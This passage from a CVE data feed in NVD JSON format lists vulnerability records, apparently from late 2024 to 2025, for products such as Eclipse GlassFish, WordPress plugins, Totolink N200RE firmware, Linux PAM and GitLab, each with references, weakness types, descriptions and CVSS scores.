"10.6.3", "cpe_name" : [ ] } ] } ] }, "impact" : { }, "publishedDate" : "2024-11-07T06:15Z", "lastModifiedDate" : "2025-05-15T17:19Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10028", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/browser/everest-backup/tags/2.2.13/inc/classes/class-backup-directory.php#L514", "name" : "https://plugins.trac.wordpress.org/browser/everest-backup/tags/2.2.13/inc/classes/class-backup-directory.php#L514", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/9b871957-a2b3-492f-b461-7040d9098b2b?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/9b871957-a2b3-492f-b461-7040d9098b2b?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Everest Backup – WordPress Cloud Backup, Migration, Restore & Cloning Plugin plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.2.13 via the exposed process stats file during the backup process. This makes it possible for unauthenticated attackers to obtain an archive file name and download the site's backup." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:everestthemes:everest_backup:*:*:*:*:*:wordpress:*:*", "versionEndExcluding" : "2.2.14", "cpe_name" : [ ] } ] } ] }, "impact" : { }, "publishedDate" : "2024-11-06T00:15Z", "lastModifiedDate" : "2024-11-08T21:21Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10029", "ASSIGNER" : "security@eclipse.org" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://gitlab.eclipse.org/security/cve-assignement/-/issues/40", "name" : "https://gitlab.eclipse.org/security/cve-assignement/-/issues/40", "refsource" : "", "tags" : [ "Issue Tracking" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "In Eclipse GlassFish version 7.0.15 is possible to perform Reflected Cross-site scripting\nattacks in the Administration Console." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:eclipse:glassfish:7.0.15:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 6.1, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.8, "impactScore" : 2.7 } }, "publishedDate" : "2025-07-16T11:15Z", "lastModifiedDate" : "2025-07-16T19:56Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-1003", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-121" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://jylsec.notion.site/TOTOLINK-N200RE-has-stack-buffer-overflow-vulnerability-in-setLanguageCfg-72357294db1e4f8096b29d3f2592d1fc?pvs=4", "name" : "https://jylsec.notion.site/TOTOLINK-N200RE-has-stack-buffer-overflow-vulnerability-in-setLanguageCfg-72357294db1e4f8096b29d3f2592d1fc?pvs=4", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.252272", "name" : "https://vuldb.com/?ctiid.252272", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.252272", "name" : "https://vuldb.com/?id.252272", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://jylsec.notion.site/TOTOLINK-N200RE-has-stack-buffer-overflow-vulnerability-in-setLanguageCfg-72357294db1e4f8096b29d3f2592d1fc?pvs=4", "name" : "https://jylsec.notion.site/TOTOLINK-N200RE-has-stack-buffer-overflow-vulnerability-in-setLanguageCfg-72357294db1e4f8096b29d3f2592d1fc?pvs=4", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.252272", "name" : "https://vuldb.com/?id.252272", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.252272", "name" : "https://vuldb.com/?ctiid.252272", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability, which was classified as critical, has been found in Totolink N200RE 9.3.5u.6139_B20201216. Affected by this issue is the function setLanguageCfg of the file /cgi-bin/cstecgi.cgi. The manipulation of the argument lang leads to stack-based buffer overflow. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-252272. NOTE: The vendor was contacted early about this disclosure but did not respond in any way." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:totolink:n200re_firmware:9.3.5u.6139_b20201216:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:totolink:n200re:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 8.8, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 2.8, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-29T15:15Z", "lastModifiedDate" : "2024-11-21T08:49Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10031", "ASSIGNER" : "security@eclipse.org" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://gitlab.eclipse.org/security/cve-assignement/-/issues/41", "name" : "https://gitlab.eclipse.org/security/cve-assignement/-/issues/41", "refsource" : "", "tags" : [ "Issue Tracking" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "In Eclipse GlassFish version 7.0.15 is possible to perform Stored Cross-site Scripting\nattacks by modifying the configuration file in the underlying operating system." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:eclipse:glassfish:7.0.15:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 5.4, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.3, "impactScore" : 2.7 } }, "publishedDate" : "2025-07-16T11:15Z", "lastModifiedDate" : "2025-07-16T19:56Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10032", "ASSIGNER" : "security@eclipse.org" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://gitlab.eclipse.org/security/cve-assignement/-/issues/42", "name" : "https://gitlab.eclipse.org/security/cve-assignement/-/issues/42", "refsource" : "", "tags" : [ "Issue Tracking" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "In Eclipse GlassFish version 7.0.15 is possible to perform Stored Cross-site scripting\nattacks in the Administration Console." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:eclipse:glassfish:7.0.15:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 5.4, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.3, "impactScore" : 2.7 } }, "publishedDate" : "2025-07-16T11:15Z", "lastModifiedDate" : "2025-07-16T19:55Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10033", "ASSIGNER" : "secalert@redhat.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://access.redhat.com/errata/RHSA-2024:8534", "name" : "RHSA-2024:8534", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://access.redhat.com/security/cve/CVE-2024-10033", "name" : "https://access.redhat.com/security/cve/CVE-2024-10033", "refsource" : "", "tags" : [ "Vendor Advisory" ] }, { "url" : "https://bugzilla.redhat.com/show_bug.cgi?id=2319162", "name" : "RHBZ#2319162", "refsource" : "", "tags" : [ "Issue Tracking", "Vendor Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in aap-gateway. A Cross-site Scripting (XSS) vulnerability exists in the gateway component. This flaw allows a malicious user to perform actions that impact users by using the \"?next=\" in a URL, which can lead to redirecting, injecting malicious script, stealing sessions and data." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:redhat:ansible_automation_platform:2.5:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:redhat:ansible_developer:1.2:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:redhat:ansible_inside:1.3:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:o:redhat:enterprise_linux:8.0:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:o:redhat:enterprise_linux:9.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 6.1, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.8, "impactScore" : 2.7 } }, "publishedDate" : "2024-10-16T17:15Z", "lastModifiedDate" : "2025-03-26T05:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10034", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3192798%40simply-gallery-block%2Ftrunk&old=3176753%40simply-gallery-block%2Ftrunk&sfp_email=&sfph_mail=", "name" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3192798%40simply-gallery-block%2Ftrunk&old=3176753%40simply-gallery-block%2Ftrunk&sfp_email=&sfph_mail=", "refsource" : "", "tags" : [ ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/89bd70b2-0b5f-4edb-890b-d291bdb8a851?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/89bd70b2-0b5f-4edb-890b-d291bdb8a851?source=cve", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Gallery Blocks with Lightbox. Image Gallery, (HTML5 video , YouTube, Vimeo) Video Gallery and Lightbox for native gallery plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the gallery link text parameter in all versions up to, and including, 3.2.4.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Editor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "HIGH", "userInteraction" : "NONE", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 5.5, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.3, "impactScore" : 2.7 } }, "publishedDate" : "2024-11-22T06:15Z", "lastModifiedDate" : "2024-11-22T06:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10035", "ASSIGNER" : "cve@usom.gov.tr" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://www.usom.gov.tr/bildirim/tr-24-1814", "name" : "https://www.usom.gov.tr/bildirim/tr-24-1814", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "Improper Control of Generation of Code ('Code Injection') vulnerability in BG-TEK Informatics Security Technologies CoslatV3 allows Command Injection.This issue affects CoslatV3: through 3.1069. \n\n\n\nNOTE: The vendor was contacted and it was learned that the product is not supported." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:bg-tek:coslat:*:*:*:*:*:*:*:*", "versionStartIncluding" : "3.0", "versionEndIncluding" : "3.1069", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-11-04T12:16Z", "lastModifiedDate" : "2024-11-08T15:11Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10037", "ASSIGNER" : "cybersecurity@hitachienergy.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-476" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://publisher.hitachienergy.com/preview?DocumentId=8DBD000207&languageCode=en&Preview=true", "name" : "https://publisher.hitachienergy.com/preview?DocumentId=8DBD000207&languageCode=en&Preview=true", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability exists in the RTU500 web server component that can cause a denial of service to the RTU500 CMU application if a specially crafted message sequence is executed on a WebSocket connection.\nAn attacker must be properly authenticated and the test mode function of RTU500 must be enabled to exploit this vulnerability.\n\nThe affected CMU will automatically recover itself if an attacker successfully exploits this vulnerability." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2025-03-25T13:15Z", "lastModifiedDate" : "2025-03-25T13:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10038", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-80" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/9f200526-890c-4a2a-9d8e-334443ef7e0b?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/9f200526-890c-4a2a-9d8e-334443ef7e0b?source=cve", "refsource" : "", "tags" : [ ] }, { "url" : "https://github.com/cmanon/wp-strava/blob/5b9499dab0eeada3887e5b64cf471e7978147154/src/WPStrava/Auth.php#L92-L93", "name" : "https://github.com/cmanon/wp-strava/blob/5b9499dab0eeada3887e5b64cf471e7978147154/src/WPStrava/Auth.php#L92-L93", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The WP-Strava plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 2.12.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 6.1, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.8, "impactScore" : 2.7 } }, "publishedDate" : "2024-11-13T02:15Z", "lastModifiedDate" : "2024-11-13T17:01Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-1004", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-121" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://jylsec.notion.site/TOTOLINK-N200RE-has-stack-buffer-overflow-vulnerability-in-loginAuth-cbde48da404049328cb698394b6c0641?pvs=4", "name" : "https://jylsec.notion.site/TOTOLINK-N200RE-has-stack-buffer-overflow-vulnerability-in-loginAuth-cbde48da404049328cb698394b6c0641?pvs=4", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.252273", "name" : "https://vuldb.com/?ctiid.252273", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.252273", "name" : "https://vuldb.com/?id.252273", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://jylsec.notion.site/TOTOLINK-N200RE-has-stack-buffer-overflow-vulnerability-in-loginAuth-cbde48da404049328cb698394b6c0641?pvs=4", "name" : "https://jylsec.notion.site/TOTOLINK-N200RE-has-stack-buffer-overflow-vulnerability-in-loginAuth-cbde48da404049328cb698394b6c0641?pvs=4", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.252273", "name" : "https://vuldb.com/?id.252273", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.252273", "name" : "https://vuldb.com/?ctiid.252273", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability, which was classified as critical, was found in Totolink N200RE 9.3.5u.6139_B20201216. This affects the function loginAuth of the file /cgi-bin/cstecgi.cgi. The manipulation of the argument http_host leads to stack-based buffer overflow. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-252273 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:totolink:n200re_firmware:9.3.5u.6139_b20201216:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:totolink:n200re:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "HIGH", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 7.2, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 1.2, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-29T15:15Z", "lastModifiedDate" : "2024-11-21T08:49Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10040", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-352" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/4045575a-35f0-46e5-afb7-93eee9be3a97?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/4045575a-35f0-46e5-afb7-93eee9be3a97?source=cve", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://plugins.trac.wordpress.org/browser/infinite-scroll/trunk/includes/presets.php#L252", "name" : "https://plugins.trac.wordpress.org/browser/infinite-scroll/trunk/includes/presets.php#L252", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://plugins.trac.wordpress.org/browser/infinite-scroll/trunk/includes/presets.php#L275", "name" : "https://plugins.trac.wordpress.org/browser/infinite-scroll/trunk/includes/presets.php#L275", "refsource" : "", "tags" : [ "Broken Link" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Infinite-Scroll plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.6.2. This is due to missing or incorrect nonce validation on the process_ajax_edit and process_ajax_delete function. This makes it possible for unauthenticated attackers to make changes to plugin settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:infinite-scroll:infinite-scroll:*:*:*:*:*:wordpress:*:*", "versionEndIncluding" : "2.6.2", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "REQUIRED", "scope" : "UNCHANGED", "confidentialityImpact" : "NONE", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 4.3, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.8, "impactScore" : 1.4 } }, "publishedDate" : "2024-10-18T05:15Z", "lastModifiedDate" : "2024-11-01T18:26Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10041", "ASSIGNER" : "secalert@redhat.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://access.redhat.com/errata/RHSA-2024:10379", "name" : "RHSA-2024:10379", "refsource" : "", "tags" : [ ] }, { "url" : "https://access.redhat.com/errata/RHSA-2024:11250", "name" : "RHSA-2024:11250", "refsource" : "", "tags" : [ ] }, { "url" : "https://access.redhat.com/errata/RHSA-2024:9941", "name" : "RHSA-2024:9941", "refsource" : "", "tags" : [ ] }, { "url" : "https://access.redhat.com/security/cve/CVE-2024-10041", "name" : "https://access.redhat.com/security/cve/CVE-2024-10041", "refsource" : "", "tags" : [ "Mitigation", "Third Party Advisory" ] }, { "url" : "https://bugzilla.redhat.com/show_bug.cgi?id=2319212", "name" : "RHBZ#2319212", "refsource" : "", "tags" : [ "Issue Tracking", "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in PAM. The secret information is stored in memory, where the attacker can trigger the victim program to execute by sending characters to its standard input (stdin). As this occurs, the attacker can train the branch predictor to execute an ROP chain speculatively. This flaw could result in leaked passwords, such as those found in /etc/shadow while performing authentications." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:linux-pam:linux-pam:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:o:redhat:enterprise_linux:7.0:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:o:redhat:enterprise_linux:8.0:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:o:redhat:enterprise_linux:9.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] } ] }, "impact" : { }, "publishedDate" : "2024-10-23T14:15Z", "lastModifiedDate" : "2024-12-18T10:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10042", "ASSIGNER" : "cve@gitlab.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2025-02-11T02:15Z", "lastModifiedDate" : "2025-02-11T02:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10043", "ASSIGNER" : "cve@gitlab.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-863" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://gitlab.com/gitlab-org/gitlab/-/issues/499577", "name" : "GitLab Issue #499577", "refsource" : "", "tags" : [ "Exploit", "Issue Tracking", "Vendor Advisory" ] }, { "url" : "https://hackerone.com/reports/2774817", "name" : "HackerOne Bug Bounty Report #2774817", "refsource" : "", "tags" : [ "Permissions Required" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "An issue has been discovered in GitLab EE affecting all versions starting from 14.3 before 17.4.6, all versions starting from 17.5 before 17.5.4 all versions starting from 17.6 before 17.6.2, that allows group users to view confidential incident title through the Wiki History Diff feature, potentially leading to information disclosure." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:*", "versionStartIncluding" : "17.6.0", "versionEndExcluding" : "17.6.2", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:*", "versionStartIncluding" : "17.5.0", "versionEndExcluding" : 